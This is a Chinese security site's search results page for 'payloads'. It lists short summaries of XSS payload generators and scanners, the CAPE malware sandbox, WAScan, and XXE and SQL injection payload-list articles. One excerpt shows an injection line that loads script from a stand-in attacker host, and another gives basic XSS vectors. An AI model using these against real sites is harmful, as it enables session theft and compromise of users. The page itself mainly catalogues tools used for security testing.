搜索 “payloads”

不再关注网络安全

office-dde-payloads

  • 2022-03-20
  • tools
  • 800 阅读

payloadsallthethings

  • 2019-11-21
  • tools
  • 2096 阅读

跨站脚本XSS Payloads生成器

跨站脚本XSS Payloads生成器

xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞:alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...

XSS Payloads

XSS Payloads

  • 2019-07-30
  • tools
  • 3442 阅读

XSS Payload生成器/XSS扫描器/XSS Dork挖掘:XSS-LOADER

XSS Payload生成器/XSS扫描器/XSS Dork挖掘:XSS-LOADER

XSS-LOADER TOOLS 一个XSS Payload生成器,多合一工具-XSS扫描,XSS挖掘。 XSS-LOADER界面 功能特征 Basic Payload 将默认参数设置为:<script>alert(1)</script> *Div Payload 将默认参数设置为:<div onpointerover='alert(1)'>MOVE HERE</div *Img Payload 将默认参数设置为:<img s...

大范围XSS扫描工具:XSS-Freak

大范围XSS扫描工具:XSS-Freak

XSS-Freak XSS-Freak是python3编写的xss扫描器。它会在网站上搜寻(进行爆破式扫描)所有可能的链接和目录以扩大其攻击范围。然后,它们会在其中搜索输入标签,然后启动一堆xss payloads。如果输入没有经过清理并且容易受到xss攻击,则该工具将拒绝… XSS-Freak:XSS扫描器 要求 一个看似存在 XSS 的网页一台能够跑多线程的 pc ...

恶意软件沙箱自动分析项目,配置/Payload/行为等详细技术分析:CAPE

恶意软件沙箱自动分析项目,配置/Payload/行为等详细技术分析:CAPE

CAPE 恶意软件配置和Payload提取 CAPE是一个恶意软件沙箱。自动执行恶意软件分析过程,目标是从恶意软件中提取Payload和配置。这使CAPE能够基于Payload签名检测恶意软件,并实现了恶意软件逆向工程和威胁情报的许多目标的自动化,亦可用于取证分析等场景。 从最初在样本上运行时,CAPE可以检测到许多恶意软件技术或行为以及特定的恶意...

WAScan – Web应用程序安全扫描器

WAScan – Web应用程序安全扫描器

WAScan - Web应用程序扫描器 WAScan是一个开源Web应用程序安全扫描程序。它旨在使用“黑匣子”方法查找各种漏洞,这意味着它不会研究Web应用程序的源代码,而是像模糊测试器(fuzzer)一样工作,扫描已部署的Web应用程序的页面,提取链接和表单并进行攻击脚本,发送payloads并查找错误消息,等等。WAScan基于python2.7构建,并且可以在具有...

XML (XXE) 注入Payload List

XML (XXE) 注入Payload List

  • 2019-11-28
  • 周边
  • 9444 阅读

XML (XXE) 注入Payload List 在本节中,我们将解释什么是XML注入,描述一些常见的示例,解释如何发现和利用各种XXE注入,并总结如何防止XXE注入攻击。 什么是XML注入? XML注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通常使攻击者可以查看应用程序服务器文件系统上的文件,并与应用程序本...

SQL注入Payload List

SQL注入Payload List

  • 2019-11-22
  • 周边
  • 6058 阅读

SQL注入Payload List 本文中解释什么是SQL注入,罗列一些常见SQL注入语句示例,常见SQL注入扫描工具等。 什么是SQL注入(SQLi)? SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询。通常,它使攻击者可以查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或者应用程序本身能够访问的任何其他数...